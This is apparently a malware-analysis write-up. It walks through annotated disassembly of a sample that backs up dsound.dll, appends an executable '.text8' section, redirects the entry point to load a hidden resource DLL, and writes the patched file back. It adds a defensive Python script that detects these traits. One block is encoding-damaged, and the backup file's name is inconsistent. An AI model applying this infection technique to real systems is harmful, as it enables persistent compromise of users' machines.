00402483  |.  E8 3CF3FFFF   call Cracker.004017C4                    ;  calls FindFirstFile to check whether the file passed in exists
00402488  |.  8BF0          mov esi,eax
0040248A  |.  8D85 10FEFFFF lea eax,[local.124]
00402490  |.  50            push eax                                 ;  check whether C:\windows\system32\dsound.dll.dat exists
004024B2  |> \8D85 10FEFFFF lea eax,[local.124]
004024B8  |.  53            push ebx
004024B9  |.  50            push eax
004024BA  |.  8D85 0CFDFFFF lea eax,[local.189]                      ;  C:\windows\system32\dsound.dll.dat
004024C0  |.  50            push eax                                 ;  C:\windows\system32\dsound.dll
004024C1  |.  FFD7          call edi                                 ;  copyfile
004024C3  |>  8D8D 14FFFFFF lea ecx,[local.59]                       ;  if "dsound.dll" exists under system directory\system\, back up dsound.dll
004024C9  |.  C645 DC 2E    mov byte ptr ss:[ebp-0x24],0x2E

Next it uses the backup file dsound.dll.dat:

004024DD  |.  C645 E1 36    mov byte ptr ss:[ebp-0x1F],0x36          ;  .text6
004024E1  |.  885D E2       mov byte ptr ss:[ebp-0x1E],bl
004024E4  |.  C645 EC 2E    mov byte ptr ss:[ebp-0x14],0x2E
004024E8  |.  C645 ED 74    mov byte ptr ss:[ebp-0x13],0x74
004024EC  |.  C645 EE 65    mov byte ptr ss:[ebp-0x12],0x65
004024F0  |.  C645 EF 78    mov byte ptr ss:[ebp-0x11],0x78
004024F4  |.  C645 F0 74    mov byte ptr ss:[ebp-0x10],0x74
004024F8  |.  C645 F1 38    mov byte ptr ss:[ebp-0xF],0x38           ;  .text8
004024FC  |.  885D F2       mov byte ptr ss:[ebp-0xE],bl
004024FF  |.  E8 6D130000   call Cracker.00403871                    ;  new, used later when copying the backup file
00402504  |.  8D85 10FEFFFF lea eax,[local.124]                      ;  C:\windows\system32\dsound.dll.dat
0040250A  |.  8D8D 14FFFFFF lea ecx,[local.59]
00402510  |.  50            push eax
00402511  |.  895D FC       mov [local.1],ebx
00402514  |.  E8 A5170000   call Cracker.00403CBE

Step into call 00403CBE:
00403D5E  |.  6A 00         push 0x0                                 ; /pOverlapped = NULL
00403D60  |.  51            push ecx                                 ; |pBytesRead
00403D61  |.  FF76 04       push dword ptr ds:[esi+0x4]              ; |FileSize
00403D64  |.  50            push eax                                 ; |Buffer
00403D65  |.  57            push edi                                 ; |hFile
00403D66  |.  FF15 10504000 call dword ptr ds:[<&kernel32.ReadFile>] ; \ReadFile
00403D6C  |.  57            push edi                                 ;  read the backed-up dsound.dll.dat into the buffer
Next it uses memcpy to copy dsound.dll.dat piece by piece into the buffer prepared earlier:
00403D6D  |.  FF5424 14     call dword ptr ss:[esp+0x14]
00403D71  |.  55            push ebp                                 ; /40  copy the first 0x40 bytes of the dsound.dll.dat PE header to 00393AD0
00403D72  |.  FF36          push dword ptr ds:[esi]                  ; |src
00403D74  |.  FF76 08       push dword ptr ds:[esi+0x8]              ; |dest
00403D77  |.  E8 B00A0000   call <jmp.&MSVCRT.memcpy>                ; \memcpy
00403D7C  |.  8B46 08       mov eax,dword ptr ds:[esi+0x8]

00403DEB  |> \0FB768 06     movzx ebp,word ptr ds:[eax+0x6]          ;  number of sections
00403DEF  |.  85ED          test ebp,ebp
00403DF1  |.  76 6E         jbe XCracker.00403E61
00403DF3  |.  836424 1C 00  and dword ptr ss:[esp+0x1C],0x0
00403DF8  |.  8D7E 1C       lea edi,dword ptr ds:[esi+0x1C]
00403DFB  |.  896C24 10     mov dword ptr ss:[esp+0x10],ebp
00403DFF  |>  8B4424 1C     /mov eax,dword ptr ss:[esp+0x1C]
00403E03  |.  6A 28         |push 0x28                               ; /n = 28 (40.)
00403E05  |.  0306          |add eax,dword ptr ds:[esi]              ; |
00403E07  |.  03C3          |add eax,ebx                             ; |
00403E09  |.  50            |push eax                                ; |src
00403E0A  |.  FF37          |push dword ptr ds:[edi]                 ; |dest
00403E0C  |.  E8 1B0A0000   |call <jmp.&MSVCRT.memcpy>               ; \memcpy
00403E11  |.  834424 28 28  |add dword ptr ss:[esp+0x28],0x28
00403E16  |.  83C4 0C       |add esp,0xC
00403E19  |.  83C7 04       |add edi,0x4
00403E1C  |.  FF4C24 10     |dec dword ptr ss:[esp+0x10]             ;  copy the section headers

00403E29? |> /8B46 18?????? /mov eax,dword ptr ds:[esi+0x18]
00403E2C? |. |8BCE????????? |mov ecx,esi
00403E2E? |. |FF70 3C?????? |push dword ptr ds:[eax+0x3C]???????????? ;? 文件對齊值200h
00403E31? |. |8B07????????? |mov eax,dword ptr ds:[edi]?????????????? ;? 區塊頭
00403E33? |. |FF70 10?????? |push dword ptr ds:[eax+0x10]???????????? ;? 區塊文件大小
00403E36? |. |E8 A5FAFFFF?? |call Cracker.004038E0??????????????????? ;? 對齊后大小
00403E3B? |. |50??????????? |push eax???????????????????????????????? ; /MemSize
00403E3C? |. |6A 40???????? |push 0x40??????????????????????????????? ; |Flags = GPTR
00403E3E? |. |FF15 38504000 |call dword ptr ds:[<&kernel32.GlobalAllo>; \GlobalAlloc
00403E44? |. |8947 50?????? |mov dword ptr ds:[edi+0x50],eax????????? ;? 開辟區塊大小
00403E47? |. |8B0F????????? |mov ecx,dword ptr ds:[edi]
00403E49? |. |FF71 10?????? |push dword ptr ds:[ecx+0x10]???????????? ; /n
00403E4C? |. |8B49 14?????? |mov ecx,dword ptr ds:[ecx+0x14]????????? ; |
00403E4F? |. |030E????????? |add ecx,dword ptr ds:[esi]?????????????? ; |
00403E51? |. |51??????????? |push ecx???????????????????????????????? ; |src
00403E52? |. |50??????????? |push eax???????????????????????????????? ; |dest
00403E53? |. |E8 D4090000?? |call <jmp.&MSVCRT.memcpy>??????????????? ; \memcpy
00403E58? |. |83C4 0C?????? |add esp,0xC????????????????????????????? ;? 拷貝區塊數據

Next, the backup file dsound.dll.bat is rewritten with a new section appended at the end of the file.

00402525  |.  50            push eax                                  ;  .text6
00402526  |.  E8 FF150000   call Cracker.00403B2A                     ;  checks whether a section has already been added
0040252B  |.  85C0          test eax,eax
00402545  |.  FF75 0C       push [arg.2]                              ;  C:\Program Files\Common Files\System\kd******.dla (resource)
00402548  |.  8D45 EC       lea eax,[local.5]                         ;  .text8
0040254B  |.  8D8D 14FFFFFF lea ecx,[local.59]
00402551  |.  68 00080000   push 0x800                                ;  size
00402556  |.  50            push eax                                  ;  .text8
00402557  |.  E8 63140000   call Cracker.004039BF                     ;  adds the section

Step in:

004039D0  |.  FF70 3C       push dword ptr ds:[eax+0x3C]              ;  FileAlignment, 200h
004039D3  |.  0FB758 06     movzx ebx,word ptr ds:[eax+0x6]           ;  NumberOfSections
004039D7  |.  FF75 0C       push [arg.2]                              ;  size = 800
004039DA  |.  E8 01FFFFFF   call Cracker.004038E0                     ;  alignment function
004039DF  |.  8B4E 18       mov ecx,dword ptr ds:[esi+0x18]
004039E2  |.  8945 0C       mov [arg.2],eax
004039E5  |.  FF71 38       push dword ptr ds:[ecx+0x38]              ;  SectionAlignment
004039E8  |.  8BCE          mov ecx,esi
004039EA  |.  50            push eax
004039EB  |.  E8 F0FEFFFF   call Cracker.004038E0                     ;  1000h
004039F0  |.  8B4E 18       mov ecx,dword ptr ds:[esi+0x18]
004039F3  |.  8945 F0       mov [local.4],eax                         ;  size rounded up to SectionAlignment, 1000h
004039F6  |.  8B449E 18     mov eax,dword ptr ds:[esi+ebx*4+0x18]     ;  last section header
004039FA  |.  FF71 3C       push dword ptr ds:[ecx+0x3C]
004039FD  |.  8B48 14       mov ecx,dword ptr ds:[eax+0x14]           ;  PointerToRawData of the last section
00403A00  |.  0348 10       add ecx,dword ptr ds:[eax+0x10]           ;  file size = raw offset + SizeOfRawData of the last section
00403A03  |.  51            push ecx
00403A04  |.  8BCE          mov ecx,esi
00403A06  |.  E8 D5FEFFFF   call Cracker.004038E0
00403A0B  |.  8B4E 18       mov ecx,dword ptr ds:[esi+0x18]
00403A0E  |.  8945 FC       mov [local.1],eax                         ;  aligned size, 59C00
00403A11  |.  8B449E 18     mov eax,dword ptr ds:[esi+ebx*4+0x18]
00403A15  |.  FF71 38       push dword ptr ds:[ecx+0x38]
00403A18  |.  8B48 0C       mov ecx,dword ptr ds:[eax+0xC]
00403A1B  |.  0348 08       add ecx,dword ptr ds:[eax+0x8]
00403A1E  |.  51            push ecx
00403A1F  |.  8BCE          mov ecx,esi
00403A21  |.  E8 BAFEFFFF   call Cracker.004038E0                     ;  end of the mapped image, aligned
00403A26  |.  8D7C9E 1C     lea edi,dword ptr ds:[esi+ebx*4+0x1C]
00403A2A  |.  6A 28         push 0x28                                 ; /n = 28 (40.)
00403A2C  |.  6A 00         push 0x0                                  ; |c = 00
00403A2E  |.  8945 F8       mov [local.2],eax                         ; | 5C000
00403A31  |.  FF37          push dword ptr ds:[edi]                   ; |s
00403A33  |.  897D EC       mov [local.5],edi                         ; |
00403A36  |.  E8 F70D0000   call <jmp.&MSVCRT.memset>                 ; \memset
00403A3B  |.  8B07          mov eax,dword ptr ds:[edi]
00403A3D  |.  8B4D FC       mov ecx,[local.1]
00403A40  |.  FF75 08       push [arg.1]                              ; /s
00403A43  |.  8948 14       mov dword ptr ds:[eax+0x14],ecx           ; |PointerToRawData
00403A46  |.  8B07          mov eax,dword ptr ds:[edi]                ; |
00403A48  |.  8B4D F8       mov ecx,[local.2]                         ; |VirtualAddress
00403A4B  |.  8948 0C       mov dword ptr ds:[eax+0xC],ecx            ; |
00403A4E  |.  8B0F          mov ecx,dword ptr ds:[edi]                ; |
00403A50  |.  8B45 0C       mov eax,[arg.2]                           ; |
00403A53  |.  8941 10       mov dword ptr ds:[ecx+0x10],eax           ; |SizeOfRawData
00403A56  |.  8B0F          mov ecx,dword ptr ds:[edi]                ; |
00403A58  |.  8941 08       mov dword ptr ds:[ecx+0x8],eax            ; |
00403A5B  |.  8B07          mov eax,dword ptr ds:[edi]                ; |
00403A5D  |.  C740 24 60000>mov dword ptr ds:[eax+0x24],0xE0000060    ; |section Characteristics
00403A64  |.  E8 BD0D0000   call <jmp.&MSVCRT.strlen>                 ; \strlen
00403A69  |.  50            push eax                                  ; /n
00403A6A  |.  FF75 08       push [arg.1]                              ; |src
00403A6D  |.  FF37          push dword ptr ds:[edi]                   ; |dest
00403A6F  |.  E8 B80D0000   call <jmp.&MSVCRT.memcpy>                 ; \memcpy
00403A74  |.  83C4 1C       add esp,0x1C                              ;  fills in the new section header
00403A77  |.  8D5C9E 6C     lea ebx,dword ptr ds:[esi+ebx*4+0x6C]
00403A7B  |.  FF75 0C       push [arg.2]                              ; /MemSize
00403A7E  |.  6A 40         push 0x40                                 ; |Flags = GPTR
00403A80  |.  FF15 38504000 call dword ptr ds:[<&kernel32.GlobalAlloc>; \GlobalAlloc
00403A86  |.  8903          mov dword ptr ds:[ebx],eax
00403A88  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]
00403A8B  |.  68 65010000   push 0x165                                ; /n = 165 (357.)
00403A90  |.  68 88604000   push Cracker.00406088                     ; |src = Cracker.00406088
00403A95  |.  66:FF40 06    inc word ptr ds:[eax+0x6]                 ; |NumberOfSections += 1
00403A99  |.  8B17          mov edx,dword ptr ds:[edi]                ; |
00403A9B  |.  8B4E 18       mov ecx,dword ptr ds:[esi+0x18]           ; |
00403A9E  |.  8B52 0C       mov edx,dword ptr ds:[edx+0xC]            ; |VirtualAddress of .text8
00403AA1  |.  8B41 28       mov eax,dword ptr ds:[ecx+0x28]           ; |eax = original OEP (1788)
00403AA4  |.  8951 28       mov dword ptr ds:[ecx+0x28],edx           ; |new OEP: execution now starts in the added section
00403AA7  |.  8B0F          mov ecx,dword ptr ds:[edi]                ; |
00403AA9  |.  2B41 0C       sub eax,dword ptr ds:[ecx+0xC]            ; |
00403AAC  |.  2D 42010000   sub eax,0x142                             ; |
00403AB1  |.  A3 E6614000   mov dword ptr ds:[0x4061E6],eax           ; |
00403AB6  |.  FF33          push dword ptr ds:[ebx]                   ; |dest
00403AB8  |.  E8 6F0D0000   call <jmp.&MSVCRT.memcpy>                 ; \memcpy
00403ABD  |.  8B03          mov eax,dword ptr ds:[ebx]                ;  copies 357 bytes from 406088 as the body of the new section
00403ABF  |.  6A 04         push 0x4                                  ; /n = 4
00403AC1  |.  68 F0614000   push Cracker.004061F0                     ; |src = Cracker.004061F0
00403AC6  |.  C680 64010000>mov byte ptr ds:[eax+0x164],0x1           ; |
00403ACD  |.  8B03          mov eax,dword ptr ds:[ebx]                ; |
00403ACF  |.  05 66010000   add eax,0x166                             ; |
00403AD4  |.  50            push eax                                  ; |dest
00403AD5  |.  E8 520D0000   call <jmp.&MSVCRT.memcpy>                 ; \memcpy
00403ADA  |.  8B03          mov eax,dword ptr ds:[ebx]                ;  copies "CSO"
00403ADC  |.  FF75 10       push [arg.3]                              ;  resource dll
00403ADF  |.  C680 65010000>mov byte ptr ds:[eax+0x165],0x78          ;  sets byte 357 of the block just copied to 0x78
00403AE6  |.  8B03          mov eax,dword ptr ds:[ebx]
00403AE8  |.  05 6A010000   add eax,0x16A
00403AED  |.  50            push eax
00403AEE  |.  E8 B0DBFFFF   call Cracker.004016A3                     ;  copies the path C:\Program Files\Common Files\System\kd******.dla

Patch the PE, then write the patched PE back to dsound.dll.bat:

00403EDD  |.  6A 03         push 0x3
00403EDF  |.  57            push edi
00403EE0  |.  FF75 08       push [arg.1]                              ;  opens the file dsound.dll.bat
00403EE3  |.  FF55 F8       call [local.2]
00403EE6  |.  83F8 FF       cmp eax,-0x1
00403EE9  |.  8945 FC       mov [local.1],eax
00403EEC  |.  75 04         jnz XCracker.00403EF2
00403EEE  |.  6A 03         push 0x3
00403EF0  |.  EB 34         jmp XCracker.00403F26
00403EF2  |>  8BCE          mov ecx,esi
00403EF4  |.  E8 FDF9FFFF   call Cracker.004038F6

Step into this call, which patches the PE:
0040390C  |> /FF70 38       /push dword ptr ds:[eax+0x38]             ;  SectionAlignment, 1000h
0040390F  |. |8B07          |mov eax,dword ptr ds:[edi]
00403911  |. |8BCE          |mov ecx,esi
00403913  |. |FF70 0C       |push dword ptr ds:[eax+0xC]              ;  section RVA
00403916  |. |E8 C5FFFFFF   |call Cracker.004038E0
0040391B  |. |8B0F          |mov ecx,dword ptr ds:[edi]
0040391D  |. |8941 0C       |mov dword ptr ds:[ecx+0xC],eax
00403920  |. |8B46 18       |mov eax,dword ptr ds:[esi+0x18]
00403923  |. |8BCE          |mov ecx,esi
00403925  |. |FF70 38       |push dword ptr ds:[eax+0x38]
00403928  |. |8B07          |mov eax,dword ptr ds:[edi]
0040392A  |. |FF70 08       |push dword ptr ds:[eax+0x8]              ;  section VirtualSize
0040392D  |. |E8 AEFFFFFF   |call Cracker.004038E0                    ;  alignment function
00403932  |. |8B0F          |mov ecx,dword ptr ds:[edi]
00403934  |. |8941 08       |mov dword ptr ds:[ecx+0x8],eax
00403937  |. |8B46 18       |mov eax,dword ptr ds:[esi+0x18]
0040393A  |. |8BCE          |mov ecx,esi
0040393C  |. |FF70 3C       |push dword ptr ds:[eax+0x3C]             ;  200h
0040393F  |. |8B07          |mov eax,dword ptr ds:[edi]
00403941  |. |FF70 14       |push dword ptr ds:[eax+0x14]             ;  PointerToRawData

00403956  |.  8B07          |mov eax,dword ptr ds:[edi]
00403958  |.  FF70 10       |push dword ptr ds:[eax+0x10]             ;  SizeOfRawData
0040395B  |.  E8 80FFFFFF   |call Cracker.004038E0                    ;  size after alignment
00403960  |.  8B0F          |mov ecx,dword ptr ds:[edi]
00403962  |.  43            |inc ebx
00403963  |.  83C7 04       |add edi,0x4
00403966  |.  8941 10       |mov dword ptr ds:[ecx+0x10],eax
00403969  |.  8B46 18       |mov eax,dword ptr ds:[esi+0x18]
0040396C  |.  0FB748 06     |movzx ecx,word ptr ds:[eax+0x6]
00403970  |.  3BD9          |cmp ebx,ecx
00403972  |.^ 7C 98         \jl XCracker.0040390C                     ;  aligns the sizes of every section
00403974  |.  5F            pop edi
00403975  |>  8B449E 18     mov eax,dword ptr ds:[esi+ebx*4+0x18]     ;  .text8
00403979  |.  8B48 0C       mov ecx,dword ptr ds:[eax+0xC]            ;  VirtualAddress
0040397C  |.  0348 08       add ecx,dword ptr ds:[eax+0x8]            ;  ecx = SizeOfImage
0040397F  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]           ;  PE header
00403982  |.  8948 50       mov dword ptr ds:[eax+0x50],ecx           ;  updates SizeOfImage
00403985  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]
00403988  |.  89A8 C8000000 mov dword ptr ds:[eax+0xC8],ebp
0040398E  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]
00403991  |.  89A8 CC000000 mov dword ptr ds:[eax+0xCC],ebp
00403997  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]
0040399A  |.  89A8 D0000000 mov dword ptr ds:[eax+0xD0],ebp
004039A0  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]
004039A3  |.  89A8 D4000000 mov dword ptr ds:[eax+0xD4],ebp
004039A9  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]
004039AC  |.  89A8 D8000000 mov dword ptr ds:[eax+0xD8],ebp           ;  overwrites data directory entries


The malware keeps the PE information in a structure of its own:
[esi+8]  = IMAGE_DOS_HEADER (0x40 bytes)
[esi+10] = A8  // size of the MS-DOS stub
[esi+C]  = MS-DOS stub
[esi+14] = size of IMAGE_DOS_HEADER = 0x40
[esi+18] = IMAGE_NT_HEADERS
[esi+1C] = array of pointers to the IMAGE_SECTION_HEADERs; following this address in the dump gives:

0012F3B8  18 3C 39 00 48 3C 39 00 78 3C 39 00 A8 3C 39 00  .<9.H<9.x<9..<9.
0012F3C8  D8 3C 39 00 08 3D 39 00 38 3D 39 00 68 3D 39 00  .<9..=9.8=9.h=9.
0012F3D8  98 3D 39 00 C8 3D 39 00 F8 3D 39 00 28 3E 39 00  .=9..=9..=9.(>9.
0012F3E8  58 3E 39 00 88 3E 39 00 B8 3E 39 00 E8 3E 39 00  X>9..>9..>9..>9.
Each entry points to one section header.
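As an added example (not code from the sample or from the original post), the following Python check re-implements the round-up alignment that Cracker.004038E0 performs and looks for the indicators this analysis describes in the patched dsound.dll: a last section with Characteristics 0xE0000060, an entry point moved into it, and a SizeOfImage equal to the aligned end of that section. The PE images it runs on are constructed inside the script; every section name and size other than .text8 with 0x800 bytes is an assumption.

```python
# Added example for this write-up (not code from the analysed sample): re-implements the
# round-up alignment of Cracker.004038E0 and checks a PE for the indicators described.
import struct

SECTION_HDR_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 0x28 bytes
SECTION_HDR_SIZE, NT_HEADERS_SIZE = 0x28, 0xF8   # the sample memcpy's 0x28 and 0xF8 bytes
RWX_CODE_DATA = 0xE0000060         # Characteristics the sample writes into .text8


def align(value, alignment):
    """Round value up to the next multiple of alignment (what Cracker.004038E0 does)."""
    return value if alignment == 0 else (value + alignment - 1) // alignment * alignment


def parse_pe(data):
    """Read the PE32 fields the sample touches; offsets match the listing (OEP at NT+0x28,
    SectionAlignment NT+0x38, FileAlignment NT+0x3C, SizeOfImage NT+0x50, headers NT+0xF8)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    entry = struct.unpack_from("<I", data, e_lfanew + 0x28)[0]
    section_align, file_align = struct.unpack_from("<II", data, e_lfanew + 0x38)
    size_of_image = struct.unpack_from("<I", data, e_lfanew + 0x50)[0]
    sections = []
    for i in range(nsections):
        off = e_lfanew + NT_HEADERS_SIZE + i * SECTION_HDR_SIZE
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR_FMT, data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "vsize": vsize,
                         "va": va, "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return {"nsections": nsections, "entry": entry, "section_align": section_align,
            "file_align": file_align, "size_of_image": size_of_image, "sections": sections}


def check_appended_section(data):
    """Return indicator strings for the appended-section pattern; [] means none matched."""
    pe = parse_pe(data)
    last = pe["sections"][-1]
    findings = []
    if last["chars"] == RWX_CODE_DATA:
        findings.append("last section %s has Characteristics 0xE0000060 (RWX code+data)" % last["name"])
    if last["va"] <= pe["entry"] < last["va"] + align(last["vsize"], pe["section_align"]):
        findings.append("entry point 0x%X lies inside last section %s" % (pe["entry"], last["name"]))
    # The sample rewrites SizeOfImage to the aligned end of the new section (00403982);
    # an infector that forgets this leaves a mismatch, which is worth reporting too.
    if pe["size_of_image"] != align(last["va"] + last["vsize"], pe["section_align"]):
        findings.append("SizeOfImage 0x%X != aligned end of last section" % pe["size_of_image"])
    return findings


def build_pe(sections, entry, section_align=0x1000, file_align=0x200):
    """Constructed fixture: minimal PE32 with zero-filled section data, laid out with the
    same alignment arithmetic the sample uses for VirtualAddress and PointerToRawData."""
    nsec = len(sections)
    headers_size = align(0x40 + NT_HEADERS_SIZE + nsec * SECTION_HDR_SIZE, file_align)
    va, rawptr, hdrs = section_align, headers_size, b""
    for name, vsize, rawsize, chars in sections:
        hdrs += struct.pack(SECTION_HDR_FMT, name.ljust(8, b"\0"), vsize, va, rawsize, rawptr,
                            0, 0, 0, 0, chars)
        va = align(va + vsize, section_align)         # next section's VirtualAddress
        rawptr = align(rawptr + rawsize, file_align)  # next section's PointerToRawData
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: NT headers right after
    file_hdr = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 0x10, entry)           # AddressOfEntryPoint
    struct.pack_into("<II", opt, 0x20, section_align, file_align)
    struct.pack_into("<I", opt, 0x38, va)              # SizeOfImage = aligned end of last section
    struct.pack_into("<I", opt, 0x3C, headers_size)    # SizeOfHeaders
    image = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + hdrs
    return image.ljust(rawptr, b"\0")                  # pad to the end of the last section


# Constructed layout; names and sizes other than .text8/0x800 are illustrative assumptions.
CLEAN_SECTIONS = [(b".text", 0x5000, 0x5000, 0x60000020),
                  (b".data", 0x1000, 0x600, 0xC0000040),
                  (b".rsrc", 0x800, 0x800, 0x40000040)]


def clean_image():
    return build_pe(CLEAN_SECTIONS, entry=0x1788)


def infected_image():
    """Same image with a 0x800-byte RWX .text8 appended and the OEP moved to its start."""
    va = 0x1000
    for _, vsize, _, _ in CLEAN_SECTIONS:
        va = align(va + vsize, 0x1000)                 # where the appended section lands
    return build_pe(CLEAN_SECTIONS + [(b".text8", 0x800, 0x800, RWX_CODE_DATA)], entry=va)
```

Running check_appended_section over a real dsound.dll copy reports two indicators for a file patched the way the listing shows, and nothing for the pristine file.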

With that worked out, the rest is straightforward.

00403E7F  |.  8B3D 00504000 mov edi,dword ptr ds:[<&kernel32.LoadLibr>;  kernel32.LoadLibraryA
00403E85  |.  8BF1          mov esi,ecx
00403E87  |.  BB 10604000   mov ebx,Cracker.00406010                  ;  ASCII "Kernel32.dll"
00403E8C  |.  68 50604000   push Cracker.00406050                     ;  ASCII "CloseHandle"
00403E91  |.  8326 00       and dword ptr ds:[esi],0x0
00403E94  |.  53            push ebx                                  ; /FileName => "Kernel32.dll"
00403E95  |.  FFD7          call edi                                  ; \LoadLibraryA
00403E97  |.  50            push eax
00403E98  |.  E8 83DAFFFF   call Cracker.00401920
00403E9D  |.  59            pop ecx
00403E9E  |.  8945 F4       mov [local.3],eax
00403EA1  |.  59            pop ecx
00403EA2  |.  68 44604000   push Cracker.00406044                     ;  ASCII "CreateFileA"

00403EE0  |.  FF75 08       push [arg.1]                              ;  opens the file dsound.dll.bat
00403EE3  |.  FF55 F8       call [local.2]
00403EE6  |.  83F8 FF       cmp eax,-0x1
00403EE9  |.  8945 FC       mov [local.1],eax
00403EEC  |.  75 04         jnz XCracker.00403EF2
00403EEE  |.  6A 03         push 0x3
00403EF0  |.  EB 34         jmp XCracker.00403F26
00403EF2  |>  8BCE          mov ecx,esi
00403EF4  |.  E8 FDF9FFFF   call Cracker.004038F6
00403EF9  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]
00403EFC  |.  0FB740 06     movzx eax,word ptr ds:[eax+0x6]           ;  NumberOfSections = 5
00403F00  |.  8B4486 18     mov eax,dword ptr ds:[esi+eax*4+0x18]     ;  .text8 section
00403F04  |.  8B48 14       mov ecx,dword ptr ds:[eax+0x14]           ;  ecx = PointerToRawData
00403F07  |.  8B40 10       mov eax,dword ptr ds:[eax+0x10]           ;  eax = SizeOfRawData of that section
00403F0A  |.  03C1          add eax,ecx                               ;  eax = file size
00403F0C  |.  50            push eax                                  ; /MemSize
00403F0D  |.  6A 40         push 0x40                                 ; |Flags = GPTR
00403F0F  |.  8946 04       mov dword ptr ds:[esi+0x4],eax            ; |
00403F12  |.  FF15 38504000 call dword ptr ds:[<&kernel32.GlobalAlloc>; \GlobalAlloc
00403F18  |.  85C0          test eax,eax                              ;  allocates the output buffer

00403F31  |> \6A 40         push 0x40                                 ; /n = 40 (64.)
00403F33  |.  FF76 08       push dword ptr ds:[esi+0x8]               ; |holds the IMAGE_DOS_HEADER
00403F36  |.  50            push eax                                  ; |dest
00403F37  |.  E8 F0080000   call <jmp.&MSVCRT.memcpy>                 ; \memcpy
00403F3C  |.  8B46 10       mov eax,dword ptr ds:[esi+0x10]
00403F3F  |.  83C4 0C       add esp,0xC
00403F42  |.  A9 00000080   test eax,0x80000000
00403F47  |.  75 12         jnz XCracker.00403F5B
00403F49  |.  50            push eax                                  ; /size of the MS-DOS stub
00403F4A  |.  8B46 14       mov eax,dword ptr ds:[esi+0x14]           ; |size of IMAGE_DOS_HEADER
00403F4D  |.  FF76 0C       push dword ptr ds:[esi+0xC]               ; |src
00403F50  |.  0306          add eax,dword ptr ds:[esi]                ; |
00403F52  |.  50            push eax                                  ; |dest
00403F53  |.  E8 D4080000   call <jmp.&MSVCRT.memcpy>                 ; \memcpy
00403F58  |.  83C4 0C       add esp,0xC
00403F5B  |> \8B46 08       mov eax,dword ptr ds:[esi+0x8]
00403F5E  |.  BB F8000000   mov ebx,0xF8
00403F63  |.  53            push ebx                                  ; /n => F8 (248.)
00403F64  |.  8B40 3C       mov eax,dword ptr ds:[eax+0x3C]           ; |e_lfanew
00403F67  |.  FF76 18       push dword ptr ds:[esi+0x18]              ; |src
00403F6A  |.  0306          add eax,dword ptr ds:[esi]                ; |IMAGE_NT_HEADERS
00403F6C  |.  50            push eax                                  ; |dest
00403F6D  |.  E8 BA080000   call <jmp.&MSVCRT.memcpy>                 ; \memcpy
00403F72  |.  8B46 08       mov eax,dword ptr ds:[esi+0x8]
00403F75  |.  83C4 0C       add esp,0xC
00403F78  |.  8B78 3C       mov edi,dword ptr ds:[eax+0x3C]
00403F7B  |.  8B46 18       mov eax,dword ptr ds:[esi+0x18]
00403F7E  |.  03FB          add edi,ebx                               ;  edi = file offset of the section headers
00403F80  |.  0FB740 06     movzx eax,word ptr ds:[eax+0x6]           ;  NumberOfSections
00403F84  |.  85C0          test eax,eax
00403F86  |.  8945 F0       mov [local.4],eax
00403F89  |.  76 52         jbe XCracker.00403FDD
00403F8B  |.  8365 08 00    and [arg.1],0x0
00403F8F  |.  8D5E 1C       lea ebx,dword ptr ds:[esi+0x1C]           ;  IMAGE_SECTION_HEADER pointers
00403F92  |.  8945 F8       mov [local.2],eax
00403F95  |>  8B45 08       /mov eax,[arg.1]
00403F98  |.  6A 28         |push 0x28                                ; /n = 28 (40.)
00403F9A  |.  0306          |add eax,dword ptr ds:[esi]               ; |
00403F9C  |.  FF33          |push dword ptr ds:[ebx]                  ; |IMAGE_SECTION_HEADER
00403F9E  |.  03C7          |add eax,edi                              ; |
00403FA0  |.  50            |push eax                                 ; |dest
00403FA1  |.  E8 86080000   |call <jmp.&MSVCRT.memcpy>                ; \memcpy
00403FA6  |.  8345 08 28    |add [arg.1],0x28
00403FAA  |.  83C4 0C       |add esp,0xC
00403FAD  |.  83C3 04       |add ebx,0x4
00403FB0  |.  FF4D F8       |dec [local.2]                            ;  count = 6
00403FB3  |.^ 75 E0         \jnz XCracker.00403F95

00403FBF  |.  8BD8          mov ebx,eax
00403FC1  |>  8B07          /mov eax,dword ptr ds:[edi]
00403FC3  |.  FF70 10       |push dword ptr ds:[eax+0x10]             ; /section SizeOfRawData
00403FC6  |.  8B40 14       |mov eax,dword ptr ds:[eax+0x14]          ; |PointerToRawData
00403FC9  |.  0306          |add eax,dword ptr ds:[esi]               ; |
00403FCB  |.  FF77 50       |push dword ptr ds:[edi+0x50]             ; |src
00403FCE  |.  50            |push eax                                 ; |dest
00403FCF  |.  E8 58080000   |call <jmp.&MSVCRT.memcpy>                ; \memcpy
00403FD4  |.  83C4 0C       |add esp,0xC
00403FD7  |.  83C7 04       |add edi,0x4
00403FDA  |.  4B            |dec ebx                                  ;  copies each section's raw data
00403FDB  |.^ 75 E4         \jnz XCracker.00403FC1
00403FDD  |>  8B5D FC       mov ebx,[local.1]                         ;  dsound.dll.bat
00403FE0  |.  8B3D 14504000 mov edi,dword ptr ds:[<&kernel32.SetFileP>;  kernel32.SetFilePointer
00403FE6  |.  33C0          xor eax,eax
00403FE8  |.  50            push eax                                  ; /Origin => FILE_BEGIN
00403FE9  |.  50            push eax                                  ; |pOffsetHi => NULL
00403FEA  |.  50            push eax                                  ; |OffsetLo => 0
00403FEB  |.  53            push ebx                                  ; |hFile
00403FEC  |.  FFD7          call edi                                  ; \SetFilePointer
00403FEE  |.  8D45 EC       lea eax,[local.5]
